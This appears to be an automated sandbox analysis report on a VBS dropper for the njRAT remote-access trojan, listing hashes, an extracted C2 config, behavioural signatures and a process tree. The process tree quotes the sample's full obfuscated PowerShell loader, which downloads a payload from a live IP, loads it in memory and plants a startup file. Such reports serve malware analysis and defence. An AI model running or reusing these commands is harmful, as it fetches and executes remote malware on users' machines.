Analysis

max time kernel: 147s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20220901-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220901-en, locale:en-us, os:windows10-2004-x64, system
submitted: 01/09/2022, 19:13

Static task: static1
Behavioral task: behavioral1
Sample: 7566214bddcf5c73e06b9e5c7504212b8632a9d97fb28446dc9a2cf2feaf42ab.vbs
Resource: win7-20220812-en
General

Target: 7566214bddcf5c73e06b9e5c7504212b8632a9d97fb28446dc9a2cf2feaf42ab.vbs
Size: 205KB
MD5: 55f65c5be5331616022acfa14b13cf0d
SHA1: 5715298639b8fa40e9621a9a1e5f4e12feb801ab
SHA256: 7566214bddcf5c73e06b9e5c7504212b8632a9d97fb28446dc9a2cf2feaf42ab
SHA512: eaa7b7cea085d6703ad604cef958426b05da22930e451f65676b0f57631e0c7328ec089b8480debc41c2ecefddd8a7e173c4f9acce5baea72476fa983f934153
SSDEEP: 96:W6Ww7isRFEDD7174KWOktsKFSG4qYk/uU95coQ18HE:l/FEDHxIBKoTjcX18k
Malware Config

Extracted
  URL: http://91.241.19.49/QWERTY/CRTZ/Dllf3.txt

Extracted
  Family: njrat
  Version: 0.7NC
  Botnet: NYAN CAT
  C2: nyas22.duckdns.org:57831
  Mutex: 8521e1f80fc24
  Attributes:
    reg_key: 8521e1f80fc24
    splitter: @!#&^%$
Signatures

Blocklisted process makes network request (1 IoC)
  flow 1, PID 1592, powershell.exe

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
  Key value queried: \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation (WScript.exe)

Drops startup file (2 IoCs)
  File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wed373kNHihfo908378&$!#$%&uhhjfn7wd.vbs (powershell.exe)
  File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wed373kNHihfo908378&$!#$%&uhhjfn7wd.vbs (powershell.exe)

Suspicious use of SetThreadContext (1 IoC)
  PID 1592 (powershell.exe) set thread context of PID 3872 (procid_target 83)

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Suspicious behavior: EnumeratesProcesses (4 IoCs)
  PID 5092 powershell.exe (2 entries)
  PID 1592 powershell.exe (2 entries)

Suspicious use of AdjustPrivilegeToken (37 IoCs)
  Token: SeDebugPrivilege, PID 5092, powershell.exe
  Token: SeDebugPrivilege, PID 1592, powershell.exe
  Token: SeDebugPrivilege, PID 3872, RegSvcs.exe
  Token: 33 and Token: SeIncBasePriorityPrivilege, PID 3872, RegSvcs.exe, alternating for the remaining 34 entries

Suspicious use of WriteProcessMemory (12 IoCs)
  PID 4612 (WScript.exe) wrote to memory of PID 5092 (procid_target 80), 2 entries
  PID 5092 (powershell.exe) wrote to memory of PID 1592 (procid_target 82), 2 entries
  PID 1592 (powershell.exe) wrote to memory of PID 3872 (procid_target 83), 8 entries
Processes

C:\Windows\System32\WScript.exe (PID 4612)
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7566214bddcf5c73e06b9e5c7504212b8632a9d97fb28446dc9a2cf2feaf42ab.vbs"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 5092, child of 4612)
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAEsASQB0AE8ATwBQAF⌚⌚⌚AaQBTAE8AVQBsAFEARABqAHYAWABBAE8AZwAlACcAOwBbAEIAeQB0AG⌚⌚⌚AWwBdAF0AIAAkAEQATABMACAAPQAgAFsA⌚⌚⌚wB5AHMAdABlAG0ALgBDAG8AbgB2AG⌚⌚⌚AcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQA⌚⌚⌚wB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAG⌚⌚⌚AdAAuAFcAZQBiAEMAbABpAG⌚⌚⌚AbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA⌚⌚⌚wB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgA0ADEALgAxADkALgA0ADkALwBRAFcARQBSAFQAWQAvAEMA⌚⌚⌚gB⌚⌚⌚AFoALwBEAGwAbABmADMALgB0AHgAdAAnACkAKQA7AFsA⌚⌚⌚wB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAH⌚⌚⌚AcgByAG⌚⌚⌚AbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQARABMAEwAKQAuAEcAZQB0AFQAeQBwAG⌚⌚⌚AKAAnAHgASwB2AEsAawB1AE4AWgAuAF⌚⌚⌚ARwBsAHkAbQB6AF⌚⌚⌚AZwAnACkALgBHAG⌚⌚⌚AdABNAG⌚⌚⌚AdABoAG8AZAAoACcAVQBEAHMA⌚⌚⌚wBpAEQAYgBiACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH⌚⌚⌚AbABsACwAIABbAG8AYgBqAG⌚⌚⌚AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AMgBYAFoALwB3AG⌚⌚⌚AbgAvAHQAcwBlAHQALwA5ADQALgA5ADEALgAxADQAMgAuADEAOQAvAC8AOgBwAHQAdABoACcAIAAsACAAJABSAG8AZABhAEMAbwBwAHkAIAAsACAAJwB3AG⌚⌚⌚AZAAzADcAMwBrAE4ASABpAGgAZgBvADkAMAA4ADMANwA4ACYAJAAhACIAIwAkAC⌚⌚⌚AJgB1AGgAaABqAGYAbgA3AHcAZAAnACAAKQApAA==';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('⌚⌚⌚','U') ) );$OWjuxD = $OWjuxD.replace('%KItOOPUiSOUlQDjvXAOg%', 'C:\Users\Admin\AppData\Local\Temp\7566214bddcf5c73e06b9e5c7504212b8632a9d97fb28446dc9a2cf2feaf42ab.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1592, child of 5092)
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\Admin\AppData\Local\Temp\7566214bddcf5c73e06b9e5c7504212b8632a9d97fb28446dc9a2cf2feaf42ab.vbs';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/QWERTY/CRTZ/Dllf3.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('xKvKkuNZ.UGlymzUg').GetMethod('UDsSiDbb').Invoke($null, [object[]] ('txt.2XZ/wen/tset/94.91.142.19//:ptth' , $RodaCopy , 'wed373kNHihfo908378&$!"#$%&uhhjfn7wd' ))"
      - Blocklisted process makes network request
      - Drops startup file
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe (PID 3872, child of 1592)
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Downloads

Filesize: 64B
MD5: 50a8221b93fbd2628ac460dd408a9fc1
SHA1: 7e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA256: 46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA512: 27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0